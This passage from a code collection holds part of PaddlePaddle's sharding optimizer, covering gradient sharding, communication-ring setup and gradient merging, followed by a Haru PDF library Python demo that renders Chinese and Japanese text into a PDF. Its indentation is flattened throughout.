if int(op.attr('op_role')) == int(OpRole.Backward):
for input_name in op.desc.input_arg_names():
# NOTE (JZ-LIANG) naive rule to support amp; if amp changes, modify here accordingly
if self.user_defined_strategy.amp:
if ".cast_fp16@GRAD" not in input_name:
continue
else:
input_name = input_name[:input_name.find(
".cast_fp16@GRAD")]
if input_name in self._backward_remain_anchors:
segment = self.collect_segment(segment, op_idx,
block)
assert input_name not in self._forward_remain_anchors, "segment anchor [{}] met twice !".format(
input_name)
self._backward_remain_anchors.remove(input_name)
self._forward_remain_anchors.append(input_name)
elif int(op.attr('op_role')) == int(OpRole.Forward):
for output_name in op.desc.output_arg_names():
if output_name in self._forward_remain_anchors:
segment = self.collect_segment(segment, op_idx,
block)
self._forward_remain_anchors.remove(output_name)
# find broadcast vars
for input_name in op.desc.input_arg_names():
if input_name not in self._broadcast_vars:
continue
if input_name in segment._param2broadcast:
# skip broadcast because it reuses the old broadcast var
broadcast_name = segment._param2broadcast[input_name]
if input_name != broadcast_name:
op._rename_input(input_name, broadcast_name)
continue
if self._shard.has_param(input_name):
broadcast_var_name = input_name
else:
broadcast_var_name = unique_name.generate(input_name +
"@BroadCast")
segment._fill_constant_vars.append(broadcast_var_name)
# (JZ-LIANG) should use Param base name ?
broadcast_var_base_name = input_name
if "subprog" in broadcast_var_base_name:
# remove suffix
broadcast_var_base_name = broadcast_var_base_name[:
broadcast_var_base_name.
find(
".subprog"
)]
var2broadcast_time[
broadcast_var_base_name] = var2broadcast_time.get(
broadcast_var_base_name, 0) + 1
segment._param2broadcast[input_name] = broadcast_var_name
segment._broadcast_vars.append((broadcast_var_name,
self._shard.device(input_name)))
segment._param_mem += get_var_size(
self._main_program.global_block().var(input_name))
# find reduce vars
if self.pp_degree > 1 and self.pp_allreduce_in_optimize:
# place pipeline gradient allreduce in optimize
pass
else:
if is_backward_op(op) and \
OP_ROLE_VAR_KEY in op.attr_names:
op_role_var = op.all_attrs()[OP_ROLE_VAR_KEY]
if len(op_role_var) != 0:
assert len(op_role_var) % 2 == 0
for i in range(0, len(op_role_var), 2):
param, reduced_grad = op_role_var[i], op_role_var[
i + 1]
segment._allreduce_vars.append(reduced_grad)
assert (reduced_grad not in
self._reduced_grads_to_param)
self._reduced_grads_to_param[reduced_grad] = param
# find cast op
if FP16Utils.is_fp16_cast_op(block, op, self._params):
fp32_param = op.desc.input_arg_names()[0]
fp16_param = op.desc.output_arg_names()[0]
if self._shard.has_param(fp32_param):
segment._cast_ops[fp16_param] = fp32_param
if segment._param_mem > 0:
segment._start_idx = 0
self._segments.insert(0, segment)
if self._sharding_segment_strategy == "segment_anchors":
assert len(
self._forward_remain_anchors) == 0, "remain anchors {}".format(
self._forward_remain_anchors)
assert len(
self._backward_remain_anchors) == 0, "remain anchors {}".format(
self._backward_remain_anchors)
if self._verbose:
for varname in sorted(
var2broadcast_time, key=var2broadcast_time.get,
reverse=True):
logging.info("Sharding broadcast: [{}] times [{}]".format(
var2broadcast_time[varname], varname))
for idx_ in range(len(self._segments)):
logging.info("segment [{}] :".format(idx_))
logging.info("start op: [{}] [{}]".format(block.ops[
self._segments[idx_]._start_idx].desc.type(), block.ops[
self._segments[idx_]._start_idx].desc.input_arg_names(
)))
logging.info("end op: [{}] [{}]".format(block.ops[
self._segments[idx_]._end_idx].desc.type(), block.ops[
self._segments[idx_]._end_idx].desc.input_arg_names()))
return
def _prune_main_program(self, block):
"""
calculate deps from allreduce op to optimize op,
remove ops and vars not needed in this worker
1. prune regularization (weight decay)
2. prune cast_fp32_to_fp16; update the amp FoundInfinite checking
3. prune gradient_clip related; update global_norm_sum
4. prune optimizer op + param + gradient
"""
weightdecay_helper = WeightDecayHelper()
weightdecay_helper.prune_weight_decay(block, self._shard)
# NOTE (JZ-LIANG) the sync of FoundInfinite should be within one entire Model Parallelism
# group, and each Data Parallelism group should have its own sync of FoundInfinite
# amp could use global group for sync
FP16Utils.prune_fp16(block, self._shard, self._reduced_grads_to_param,
self.global_ring_id)
# clipbyglobalnorm should only use the Model parallelism group (mp-sharding-pp)
if self.mp_degree * self.pp_degree == 1:
# separate the sharding-hybrid scenario to keep the accuracy
gradientclip_helper = GradientClipHelper(self.sharding_ring_id)
gradientclip_helper.prune_gradient_clip(
block, self._shard, pure_dp_degree=1)
else:
gradientclip_helper = GradientClipHelper(self.global_ring_id)
gradientclip_helper.prune_gradient_clip(
block, self._shard, pure_dp_degree=self.dp_degree)
# build prog deps
reduced_grads = []
for idx, op in enumerate(block.ops):
input_names = op.desc.input_arg_names()
output_names = op.desc.output_arg_names()
if op.type == "c_allreduce_sum":
assert (len(output_names) == 1)
output_name = output_names[0]
reduced_grads.append(output_name)
# prune optimizer state and param
pruned_opti_vars = []
for var_name in list(block.vars.keys()):
if self._shard.is_opti_var(var_name) and \
not self._shard.has_opt_var(var_name):
pruned_opti_vars.append(var_name)
program_deps = ProgramDeps(block, reduced_grads, pruned_opti_vars)
# Init
for var_name in program_deps._end_vars:
program_deps._should_removed_var.add(var_name)
# Prune
for idx, op in reversed(list(enumerate(block.ops))):
if op.type in [
"c_allreduce_sum",
"c_sync_comm_stream",
"c_calc_comm_stream",
"c_gen_nccl_id",
"c_comm_init",
'send_v2',
'recv_v2',
]:
pass
elif op.type == "conditional_block":
assert (op.desc.has_attr("sub_block"))
subblock_idx = op.desc.attr("sub_block").id
subblock_deps = program_deps.get_sub_block_deps(subblock_idx)
# only prune amp subblock
if subblock_deps is None or not self._is_amp_subblock(op):
continue
# init
reversed_output_vars = []
for output_name in op.desc.output("Out"):
if output_name in program_deps._should_removed_var:
subblock_deps._should_removed_var.add(output_name)
program_deps.crop_output_var_from_op(idx, output_name)
else:
reversed_output_vars.append(output_name)
# prune
for sub_op_idx, _ in reversed(
list(enumerate(subblock_deps._block.ops))):
if subblock_deps.should_remove_op(sub_op_idx):
subblock_deps.remove_op(sub_op_idx)
reversed_input_vars = []
for input_name in op.desc.input('Input'):
if input_name not in subblock_deps._should_removed_var:
reversed_input_vars.append(input_name)
else:
program_deps.crop_input_var_from_op(idx, input_name)
op.desc.set_input('Input', reversed_input_vars)
op.desc.set_output('Out', reversed_output_vars)
else:
# if all outputs of this op are in _should_removed_var
# _should_removed_var: opt state not in the current shard
if program_deps.should_remove_op(idx):
program_deps.remove_op(idx)
# NOTE (JZ-LIANG) revise and unify logic here
# sharding support fp16_allreduce logic
block._sync_with_cpp()
for idx, op in reversed(list(enumerate(block.ops))):
if op.type == 'concat' and is_optimizer_op(op):
# remove inputs that are not on this card
reserved_x = []
for var_name in op.desc.input("X"):
if block.has_var(var_name): reserved_x.append(var_name)
op.desc.set_input('X', reserved_x)
block._sync_with_cpp()
return
def _add_broadcast_allreduce(self, block):
"""
add broadcast allreduce op
if gradient_merge is enabled, insert the related ops
if combined with pipeline (grad accumulation),
the grad allreduce should be done in the optimize role
"""
if len(self._segments) < 1:
return
# sharding
if self.pp_degree > 1 and self.pp_allreduce_in_optimize:
for idx in range(len(self._segments)):
assert len(self._segments[idx]._allreduce_vars) == 0
# NOTE (JZ-LIANG) revise and unify logic here
# fix the _end_idx for segments[-1] if pp is used.
new_end_idx = self._segments[-1]._end_idx
for idx in range(self._segments[-1]._end_idx - 1,
self._segments[-1]._start_idx - 1, -1):
op = block.ops[idx]
if op.type == "fill_constant" or op.type == "sum":
if "MERGED" in op.output_arg_names[0]: new_end_idx = idx + 1
elif op.type == "cast":
if "@TMP" in op.output_arg_names[0]: new_end_idx = idx + 1
self._segments[-1]._end_idx = new_end_idx
if self._segments[-1]._allreduce_vars:
shard_allredue_vars = self._shard.filter_grads(self._segments[-1]
._allreduce_vars)
if self.gradient_merge_mode != "sharding_gm" or self._gradient_merge_acc_step <= 1:
if self.hybrid_dp and self.hybrid_dp_mode == "sharding_hybrid_dp" and len(
shard_allredue_vars) >= 1:
insert_sync_comm_ops(block, self._segments[-1]._end_idx,
self.dp_ring_id, shard_allredue_vars)
insert_allreduce_ops(block, self._segments[-1]._end_idx,
self.dp_ring_id, shard_allredue_vars)
# gradient merge
elif self.gradient_merge_mode == "sharding_gm" and self._gradient_merge_acc_step > 1:
self.create_persistable_gradients_and_insert_merge_ops(
block,
self._startup_program.global_block(),
self._segments[-1]._end_idx, shard_allredue_vars,
self._shard)
insert_sync_comm_ops(block, self._segments[-1]._end_idx,
self.sharding_ring_id,
self._segments[-1]._allreduce_vars)
# allreduce --> reduce
insert_reduce_ops(
block,
self._segments[-1]._end_idx,
self.sharding_ring_id,
self._segments[-1]._allreduce_vars,
self._shard,
op_role=OpRole.Backward,
use_calc_stream=False)
for idx, segment in reversed(list(enumerate(self._segments))):
allreduce_vars = self._segments[
idx - 1]._allreduce_vars if idx > 0 else []
broadcast_vars = self._segments[idx +
1]._broadcast_vars if idx < len(
self._segments) - 1 else []
fill_constant_vars = self._segments[
idx + 2]._fill_constant_vars if idx < len(
self._segments) - 2 else []
cast_ops = self._segments[idx + 2]._cast_ops if idx < len(
self._segments) - 2 else {}
for op_idx in reversed(range(segment._start_idx, segment._end_idx)):
op = block.ops[op_idx]
for input_name in op.desc.input_arg_names():
if input_name in segment._param2broadcast and \
input_name != segment._param2broadcast[input_name]:
op._rename_input(input_name,
segment._param2broadcast[input_name])
for param_name, broadcast_name in segment._param2broadcast.items():
if param_name != broadcast_name:
block.create_var(
name=broadcast_name,
shape=self._main_program.global_block().var(
param_name).shape,
dtype=self._main_program.global_block().var(param_name)
.dtype,
persistable=False)
# step1: remove cast ops
block._sync_with_cpp()
segment._end_idx += FP16Utils.remove_cast_op(block, self._params,
segment, 0)
# step2: add Sync ops
shard_allredue_vars = self._shard.filter_grads(allreduce_vars)
if self.gradient_merge_mode != "sharding_gm" or self._gradient_merge_acc_step <= 1:
if self.hybrid_dp and self.hybrid_dp_mode == "sharding_hybrid_dp" and len(
shard_allredue_vars) >= 1:
insert_sync_comm_ops(block, segment._end_idx,
self.dp_ring_id, shard_allredue_vars)
broad_cast_vars = [x[0] for x in broadcast_vars]
if len(broad_cast_vars) > 0:
insert_sync_comm_ops(block, segment._end_idx,
self.sharding_ring_id,
broad_cast_vars)
else:
comm_dep_vars = allreduce_vars + [
x[0] for x in broadcast_vars
]
if len(comm_dep_vars) > 0:
insert_sync_comm_ops(block, segment._end_idx,
self.sharding_ring_id,
comm_dep_vars)
# gradient merge
elif self.gradient_merge_mode == "sharding_gm" and self._gradient_merge_acc_step > 1:
broad_cast_vars = [x[0] for x in broadcast_vars]
if len(broad_cast_vars) > 0:
insert_sync_comm_ops(block, segment._end_idx,
self.sharding_ring_id, broad_cast_vars)
calc_dep_vars = fill_constant_vars + [
k for k, v in cast_ops.items()
] + self._segments[idx]._allreduce_vars
if len(calc_dep_vars) > 0:
insert_sync_calc_op(block, segment._end_idx,
[calc_dep_vars[-1]])
# step3: insert `fill_constant` ops
insert_fill_constant_ops(block, segment._end_idx,
fill_constant_vars)
# step4: add `cast` ops
insert_cast_ops(block, segment._end_idx, cast_ops)
# step5: add broadcast ops
# gradient merge
if self.gradient_merge_mode == "sharding_gm" and self._gradient_merge_acc_step > 1:
self.create_persistable_gradients_and_insert_merge_ops(
block,
self._startup_program.global_block(), segment._start_idx,
shard_allredue_vars, self._shard)
insert_broadcast_ops(block, segment._start_idx,
self.sharding_ring_id, broadcast_vars)
# step6: add all_reduce ops
# dp
if self.gradient_merge_mode != "sharding_gm" or self._gradient_merge_acc_step <= 1:
if self.hybrid_dp and self.hybrid_dp_mode == "sharding_hybrid_dp" and len(
shard_allredue_vars) >= 1:
insert_allreduce_ops(block, segment._start_idx,
self.dp_ring_id, shard_allredue_vars)
insert_sync_comm_ops(block, segment._start_idx,
self.sharding_ring_id, allreduce_vars)
# gradient merge
elif self.gradient_merge_mode == "sharding_gm" and self._gradient_merge_acc_step > 1:
insert_sync_comm_ops(block, segment._start_idx,
self.sharding_ring_id, allreduce_vars)
# sharding
# allreduce --> reduce
# TODO temp change
if len(allreduce_vars) > 0:
insert_reduce_ops(
block,
segment._start_idx,
self.sharding_ring_id,
allreduce_vars,
self._shard,
op_role=OpRole.Backward,
use_calc_stream=False)
block._sync_with_cpp()
if self._segments[0]._broadcast_vars:
broadcast_vars = [x[0] for x in self._segments[0]._broadcast_vars]
insert_sync_comm_ops(block, self._segments[0]._start_idx,
self.sharding_ring_id, broadcast_vars)
insert_broadcast_ops(block, self._segments[0]._start_idx,
self.sharding_ring_id,
self._segments[0]._broadcast_vars)
fill_constant_vars = []
for x in self._segments[:2]:
fill_constant_vars += x._fill_constant_vars
# Join
cast_ops = {}
for x in self._segments[:2]:
for k, v in x._cast_ops.items():
cast_ops[k] = v
calc_deps_vars = fill_constant_vars + [k for k, v in cast_ops.items()]
if fill_constant_vars or cast_ops:
insert_sync_calc_op(block, self._segments[0]._start_idx,
[calc_deps_vars[-1]])
if fill_constant_vars:
insert_fill_constant_ops(block, self._segments[0]._start_idx,
fill_constant_vars)
if cast_ops:
insert_cast_ops(block, self._segments[0]._start_idx, cast_ops)
return
def _prune_startup_program(self, block):
for idx, op in reversed(list(enumerate(block.ops))):
for output_name in op.desc.output_arg_names():
if self._shard.has_var(output_name):
continue
# TODO: why is the whole op removed when only one of its output vars is pruned from the shard?
block._remove_op(idx, sync=False)
break
for var_name in list(block.vars.keys()):
if self._shard.has_var(var_name):
continue
block._remove_var(var_name, sync=False)
block._sync_with_cpp()
def _build_groups(self):
"""
pre-assign ring ids
mp: 0
sharding: 1
pure-dp: 2
global: 3
pp: >= 20
if one parallelism is not enabled: -1
only the parallelism hierarchy mp --> sharding --> pp --> dp is supported
"""
# step 1: initialize nccl
self.global_word_size = self.role_maker._worker_num()
self.global_rank = self.role_maker._worker_index()
self.global_endpoints = self.role_maker._get_trainer_endpoints()
self.current_endpoint = self.global_endpoints[self.global_rank]
self._collective_helper = CollectiveHelper(
self.role_maker, nrings=self._nrings_sharding)
assert self.global_word_size % self.mp_degree == 0, \
"global_word_size: {} should be divisible by the mp_degree: {}".format(self.global_word_size, self.mp_degree)
assert self.global_word_size % self.sharding_degree == 0, \
"global_word_size: {} should be divisible by the sharding_degree: {}".format(self.global_word_size, self.sharding_degree)
assert self.global_word_size % self.pp_degree == 0, \
"global_word_size: {} should be divisible by the pp_degree: {}".format(self.global_word_size, self.pp_degree)
assert self.global_word_size % self.dp_degree == 0, \
"global_word_size: {} should be divisible by the dp_degree: {}".format(self.global_word_size, self.dp_degree)
# mp group
if self.mp_degree > 1:
self.mp_ring_id = 0
self.mp_rank = self.global_rank % self.mp_degree
self.mp_group_id = self.global_rank // self.mp_degree
self.mp_group_endpoints = [
ep for idx, ep in enumerate(self.global_endpoints)
if idx // self.mp_degree == self.mp_group_id
]
assert self.current_endpoint in self.mp_group_endpoints
assert len(
self.mp_group_endpoints
) == self.mp_degree, "number of mp workers in group is [{}], but mp group size is [{}]".format(
len(self.mp_group_endpoints), self.mp_degree)
else:
self.mp_degree = 1
self.mp_ring_id = -1
self.mp_rank = -1
self.mp_group_id = -1
self.mp_group_endpoints = []
# sharding
if self.sharding_degree > 1:
self.sharding_ring_id = 1
self.sharding_rank = (self.global_rank //
self.mp_degree) % self.sharding_degree
self.sharding_group_id = self.global_rank // (self.mp_degree *
self.sharding_degree)
# mp + sharding + ...
if self.mp_degree > 1:
self.sharding_group_endpoints = [
ep for idx, ep in enumerate(self.global_endpoints)
if (idx // (self.mp_degree * self.sharding_degree)) == self.
sharding_group_id and idx % self.mp_degree == self.mp_rank
]
# sharding + ...
else:
self.sharding_group_endpoints = [
ep for idx, ep in enumerate(self.global_endpoints)
if (idx // (self.mp_degree * self.sharding_degree)
) == self.sharding_group_id
]
assert self.current_endpoint in self.sharding_group_endpoints
else:
self.sharding_degree = 1
self.sharding_ring_id = -1
self.sharding_rank = -1
self.sharding_group_id = -1
self.sharding_group_endpoints = []
# pp
if self.pp_degree > 1:
self.pp_ring_id = 20
self.pp_rank = self.global_rank // (self.sharding_degree *
self.mp_degree) % self.pp_degree
# NOTE: already adjusted for the (outer, pure) dp dimension
self.pp_group_id = self.global_rank // (
self.mp_degree * self.sharding_degree * self.pp_degree)
pp_first_stage_idx = self.global_rank % (
self.sharding_degree * self.mp_degree) + self.pp_group_id * (
self.mp_degree * self.sharding_degree * self.pp_degree)
pp_stage_offset = self.sharding_degree * self.mp_degree
self.pp_group_endpoints = []
for i in range(self.pp_degree):
self.pp_group_endpoints.append(self.global_endpoints[
pp_first_stage_idx + pp_stage_offset * i])
assert self.current_endpoint in self.pp_group_endpoints
else:
self.pp_degree = 1
self.pp_ring_id = -1
self.pp_rank = -1
self.pp_group_id = -1
self.pp_group_endpoints = []
# outer-pure-dp group
# NOTE (JZ-LIANG) support outer-pure-dp to scale the throughput in 3D parallelism,
# e.g. mp-sharding-pp-dp
# sharding-hybrid-dp is one scenario of outer-pure-dp
assert self.global_word_size == self.mp_degree * self.sharding_degree * self.pp_degree * self.dp_degree, "mp_degree: [{}], sharding_degree: [{}], pp_degree: [{}], dp_degree: [{}]; BUT global nrank: [{}]".format(
self.mp_degree, self.sharding_degree, self.pp_degree,
self.dp_degree, self.global_word_size)
if self.dp_degree > 1:
self.dp_ring_id = 2
self.dp_rank = self.global_rank // (self.sharding_degree *
self.mp_degree * self.pp_degree)
dp_first_rank_idx = self.global_rank % (
self.sharding_degree * self.mp_degree * self.pp_degree)
dp_offset = (self.sharding_degree * self.mp_degree * self.pp_degree)
self.dp_group_endpoints = []
for i in range(self.dp_degree):
self.dp_group_endpoints.append(self.global_endpoints[
dp_first_rank_idx + dp_offset * i])
assert self.current_endpoint in self.dp_group_endpoints
logging.info("Hybrid DP mode turn on !")
else:
self.dp_ring_id = -1
self.dp_rank = -1
self.dp_group_endpoints = []
# global group
# use for gen_nccl_comm_sync, amp check nan inf, clip by global norm
# NOTE (JZ-LIANG) when the global ring is used to calculate the global norm and dp_degree > 1, the allreduce result should be divided by dp_degree
self.global_ring_id = 3
logging.info("global word size: {}".format(self.global_word_size))
logging.info("global rank: {}".format(self.global_rank))
logging.info("global endpoints: {}".format(self.global_endpoints))
logging.info("global ring id: {}".format(self.global_ring_id))
logging.info("#####" * 6)
logging.info("mp group size: {}".format(self.mp_degree))
logging.info("mp rank: {}".format(self.mp_rank))
logging.info("mp group id: {}".format(self.mp_group_id))
logging.info("mp group endpoints: {}".format(self.mp_group_endpoints))
logging.info("mp ring id: {}".format(self.mp_ring_id))
logging.info("#####" * 6)
logging.info("sharding group size: {}".format(self.sharding_degree))
logging.info("sharding rank: {}".format(self.sharding_rank))
logging.info("sharding group id: {}".format(self.sharding_group_id))
logging.info("sharding group endpoints: {}".format(
self.sharding_group_endpoints))
logging.info("sharding ring id: {}".format(self.sharding_ring_id))
logging.info("#####" * 6)
logging.info("pp group size: {}".format(self.pp_degree))
logging.info("pp rank: {}".format(self.pp_rank))
logging.info("pp group id: {}".format(self.pp_group_id))
logging.info("pp group endpoints: {}".format(self.pp_group_endpoints))
logging.info("pp ring id: {}".format(self.pp_ring_id))
logging.info("#####" * 6)
logging.info("pure dp group size: {}".format(self.dp_degree))
logging.info("pure dp rank: {}".format(self.dp_rank))
logging.info("pure dp group endpoints: {}".format(
self.dp_group_endpoints))
logging.info("pure dp ring id: {}".format(self.dp_ring_id))
logging.info("#####" * 6)
return
def _initialization_broadcast(self, startup_block):
"""
this function ensures that parameter initialization across the dp group
is identical when hybrid-dp is used.
"""
params = []
for param in startup_block.iter_parameters():
params.append(param)
startup_block.append_op(
type='c_broadcast',
inputs={'X': param},
outputs={'Out': param},
attrs={
'ring_id': self.dp_ring_id,
'root': 0,
OP_ROLE_KEY: OpRole.Forward
})
startup_block.append_op(
type='c_sync_comm_stream',
inputs={'X': params},
outputs={'Out': params},
attrs={'ring_id': self.dp_ring_id,
OP_ROLE_KEY: OpRole.Forward})
# sync within global group
append_naive_sync(startup_block, self.startup_prog_sync_var,
self.global_ring_id)
# sharding gradient merge
def create_persistable_gradients_and_insert_merge_ops(
self, main_block, startup_block, insert_idx, grad_names, shard):
for grad_name in grad_names:
assert get_grad_device(
grad_name, shard
) == shard.worker_idx, "trying to merge a gradient that does not belong to the current shard: [{}]".format(
grad_name)
persistable_grad_name = grad_name + '@GradiantMerge'
assert grad_name not in self._grad2merged_grad, "grad [{}] is already in grad2merged_grad, maybe you hit a shared-weight case!".format(
grad_name)
self._grad2merged_grad[grad_name] = persistable_grad_name
grad_var = main_block.var(grad_name)
# create var
gradient_merge_var = main_block.create_var(
name=persistable_grad_name,
shape=grad_var.shape,
dtype=grad_var.dtype,
persistable=True)
startup_gradient_merge_var = startup_block.create_var(
name=persistable_grad_name,
shape=grad_var.shape,
dtype=grad_var.dtype,
persistable=True)
# merge gradient
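# elementwise_add accumulates the current micro-batch gradient into the
# persistable buffer (merged += grad); the buffer is zeroed again after each
# optimizer step in _true_apply_gradient.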
main_block._insert_op_without_sync(
insert_idx,
type="elementwise_add",
inputs={'X': grad_name,
'Y': gradient_merge_var},
outputs={'Out': gradient_merge_var},
attrs={
'axis': -1,
'use_mkldnn': False,
OP_ROLE_KEY: OpRole.Backward
})
# startup initialization
startup_block.append_op(
type="fill_constant",
outputs={"Out": startup_gradient_merge_var},
attrs={
"shape": grad_var.shape,
"dtype": grad_var.dtype,
"value": float(0),
})
main_block._sync_with_cpp()
startup_block._sync_with_cpp()
def _create_gm_cond(self, main_block):
# Add const var
acc_step_var = layers.create_global_var(
name="gradient_merge_acc_step",
shape=[1],
value=int(self._gradient_merge_acc_step),
dtype='int32',
persistable=True,
force_cpu=True)
zero_var = layers.create_global_var(
name="gradient_merge_zero",
shape=[1],
value=int(0),
dtype='int32',
persistable=True,
force_cpu=True)
# Add step var & cond var
current_step_var = layers.create_global_var(
name="gradient_merge_current_step",
shape=[1],
value=int(0),
dtype='int32',
persistable=True,
force_cpu=True)
cond_var = layers.create_global_var(
name="gradient_merge_cond",
shape=[1],
value=bool(0),
dtype='bool',
persistable=False,
force_cpu=True)
with device_guard("cpu"):
# step_var = (step_var + 1) % k_step
main_block.append_op(
type='increment',
inputs={'X': [current_step_var]},
outputs={'Out': [current_step_var]},
attrs={'step': float(1),
OP_ROLE_KEY: OpRole.Optimize})
main_block.append_op(
type='elementwise_mod',
inputs={'X': current_step_var,
'Y': acc_step_var},
outputs={'Out': current_step_var},
attrs={
'axis': -1,
OP_ROLE_KEY: OpRole.Optimize,
'use_mkldnn': False
})
# cond_var = (step_var == 0)
main_block.append_op(
type='equal',
inputs={'X': current_step_var,
'Y': zero_var},
outputs={'Out': cond_var},
attrs={OP_ROLE_KEY: OpRole.Optimize})
# paddle.static.Print(current_step_var, message="in FWBW last conditional")
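# For example, with _gradient_merge_acc_step == 4 the counter cycles
# 1, 2, 3, 0, ... so cond_var is True on every 4th call; this flag gates the
# conditional_block built in _sharding_gradient_merge.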
return cond_var
def _true_apply_gradient(self):
"""
allreduce grad@gradientmerge in dp group
grad@gradientmerge / acc_step
re-create all optimize ops of the original main block and rename them
cast(backward)
amp
clip
opt
# fill constant grad@gradientmerge
"""
# current conditional block
main_block = self._main_program.global_block()
cur_block_idx = self._main_program.current_block_idx
cur_block = self._main_program.current_block()
self.cond_block = self._main_program.current_block()
# cur_block's forward_block & backward_block is itself
cur_block._set_forward_block_idx(cur_block_idx)
# allreduce grad@gradientmerge
if self.hybrid_dp:
assert self.dp_ring_id >= 0, "dp_ring_id should be non-negative when in sharding & DP mode"
for grad, merged_grad in self._grad2merged_grad.items():
merged_grad_var = main_block.var(merged_grad)
cur_block.append_op(
type='c_allreduce_sum',
inputs={'X': merged_grad_var},
outputs={'Out': merged_grad_var},
attrs={
'ring_id': self.dp_ring_id,
'use_calc_stream': True,
OP_ROLE_KEY: OpRole.Optimize
})
# grad@gradientmerge / acc_step
for grad, merged_grad in self._grad2merged_grad.items():
# grad /= k_steps
merged_grad_var = main_block.var(merged_grad)
cur_block.append_op(
type='scale',
inputs={'X': merged_grad_var},
outputs={'Out': merged_grad_var},
attrs={
'scale': 1.0 / float(self._gradient_merge_acc_step),
'bias': 0.0,
'bias_after_scale': False,
OP_ROLE_KEY: OpRole.Optimize
})
# re-create optimize ops
already_moved_var_names = []
for op_desc in self.original_optimize_ops_desc:
new_op_desc = cur_block.desc.append_op()
new_op_desc.copy_from(op_desc)
for input_name in new_op_desc.input_arg_names():
if input_name in self._grad2merged_grad:
new_op_desc._rename_input(
input_name, self._grad2merged_grad[input_name])
for output_name in new_op_desc.output_arg_names():
if output_name in self._grad2merged_grad:
new_op_desc._rename_output(
output_name, self._grad2merged_grad[output_name])
# move non temp optimize vars from block0 to cond block
if output_name not in already_moved_var_names and output_name not in self._grad2merged_grad.keys(
):
var_ = self._main_program.global_block().var(output_name)
if not var_.persistable:
# move
name_ = var_.name
shape_ = var_.shape
type_ = var_.dtype
self._main_program.global_block()._remove_var(
var_.name, sync=False)
self.cond_block.create_var(
name=name_,
shape=shape_,
dtype=type_,
persistable=False)
already_moved_var_names.append(name_)
self._main_program.global_block()._sync_with_cpp()
cur_block._sync_with_cpp()
# fill zero to grad@gradientmerge
for grad, merged_grad in self._grad2merged_grad.items():
merged_grad_var = main_block.var(merged_grad)
cur_block.append_op(
type='fill_constant',
outputs={'Out': merged_grad_var},
attrs={
"shape": merged_grad_var.shape,
"dtype": merged_grad_var.dtype,
"value": float(0),
OP_ROLE_KEY: OpRole.Optimize
})
# lr_var = main_block.var("gradient_merge_current_step")
# paddle.static.Print(lr_var, message="in OPTIMIZE last conditional")
def _sharding_gradient_merge(self, main_block):
"""
copy all optimize ops from the original main block
remove all optimize ops from the original main block
create cond block
"""
# copy original optimize ops to temp ops desc list
# remove them from block 0
tmp_copy_block = self._main_program._create_block()
self.original_optimize_ops_desc = []
for op_idx, op in reversed(list(enumerate(main_block.ops))):
if int(op.attr('op_role')) != int(OpRole.Optimize):
continue
else:
tmp_op_desc = tmp_copy_block.desc.append_op()
tmp_op_desc.copy_from(op.desc)
self.original_optimize_ops_desc.append(tmp_op_desc)
main_block._remove_op(op_idx, sync=False)
tmp_copy_block._sync_with_cpp()
self.original_optimize_ops_desc = list(
reversed(self.original_optimize_ops_desc))
# back to block 0
self._main_program._rollback()
# create cond vars and ops at the end of block 0
cond = self._create_gm_cond(main_block)
# create cond block
cond_block = self._main_program._create_block()
self._true_apply_gradient()
# back to block 0
self._main_program._rollback()
# cond op
step_scope = self._main_program.global_block().create_var(
type=core.VarDesc.VarType.STEP_SCOPES)
conditional_block_op = self._main_program.global_block().append_op(
type='conditional_block',
inputs={
'Cond': cond,
'Input': [],
},
outputs={'Out': [],
'Scope': [step_scope]},
attrs={
'sub_block': cond_block,
'is_scalar_condition': True,
})
| apache-2.0 |
koljanos/dakoljanos-anotherone | jni/libhpdf-2.3.0RC2/if/python/demo/chfont_demo.py | 32 | 3358 | ###
## * << Haru Free PDF Library 2.0.0 >> -- chfont_demo.c
## *
## * Copyright (c) 1999-2006 Takeshi Kanno <takeshi_kanno@est.hi-ho.ne.jp>
## *
## * Permission to use, copy, modify, distribute and sell this software
## * and its documentation for any purpose is hereby granted without fee,
## * provided that the above copyright notice appear in all copies and
## * that both that copyright notice and this permission notice appear
## * in supporting documentation.
## * It is provided "as is" without express or implied warranty.
## *
##
## port to python by Li Jun
## http://groups.google.com/group/pythoncia
import os, sys
from ctypes import *
up=2
def setlibpath(up):
import sys
path = os.path.normpath(os.path.split(os.path.realpath(__file__))[0] + '/..' * up)  # '/..' keeps the relative step portable across platforms
if path not in sys.path:
sys.path.append(path)
setlibpath(up)
from haru import *
from haru.c_func import *
from haru.hpdf_errorcode import *
from grid_sheet import *
@HPDF_Error_Handler(None, HPDF_UINT, HPDF_UINT, c_void_p)
def error_handler (error_no, detail_no, user_data):
global pdf
printf ("ERROR: %s, detail_no=%u\n", error_detail[error_no],
detail_no)
HPDF_Free (pdf)
sys.exit(1)
def main ():
global pdf
# four arguments are required in addition to the script name
if (len(sys.argv) < 5):
printf ("chfont_demo <cp936-ttc-font-file-name> "
"<cp936-index> <cp932-ttc-font-file-name> <cp932-index>\n")
return 1
fname="mbtext/%s"% "cp932.txt"
cp932 = open (fname, "rb")
if (not cp932):
printf ("error: cannot open cp932.txt\n")
return 1
fname= "mbtext/%s" % "cp936.txt"
cp936 = open (fname, "rb")
if (not cp936):
printf ("error: cannot open cp936.txt\n")
return 1
fname=os.path.realpath(sys.argv[0])
fname=fname[:fname.rfind('.')]+'.pdf'
pdf = HPDF_New (error_handler, NULL)
if (not pdf):
printf ("error: cannot create PdfDoc object\n")
return 1
HPDF_SetCompressionMode (pdf, HPDF_COMP_ALL)
HPDF_UseJPEncodings (pdf)
HPDF_UseCNSEncodings (pdf)
fcp936_name = HPDF_LoadTTFontFromFile2 (pdf, sys.argv[1], int(sys.argv[2]),
HPDF_TRUE)
fcp932_name = HPDF_LoadTTFontFromFile2 (pdf, sys.argv[3], int(sys.argv[4]),
HPDF_TRUE)
# add a new page object.
page = HPDF_AddPage (pdf)
HPDF_Page_SetHeight (page, 300)
HPDF_Page_SetWidth (page, 550)
fcp936 = HPDF_GetFont (pdf, fcp936_name, "GBK-EUC-H")
fcp932 = HPDF_GetFont (pdf, fcp932_name, "90ms-RKSJ-H")
print_grid (pdf, page)
HPDF_Page_SetTextLeading (page, 20)
HPDF_Page_BeginText (page)
HPDF_Page_MoveTextPos (page, 50, 250)
HPDF_Page_SetTextLeading (page, 25)
buf=cp936.read(1024)
while buf:
HPDF_Page_SetFontAndSize (page, fcp936, 18)
buf ='%s\0' % buf
HPDF_Page_ShowText (page, buf)
buf=cp936.read(1024)
if buf:
HPDF_Page_SetFontAndSize (page, fcp932, 18)
buf ='%s\0' % buf
HPDF_Page_ShowText (page, buf)
HPDF_Page_MoveToNextLine (page)
# save the document to a file
HPDF_SaveToFile (pdf, fname)
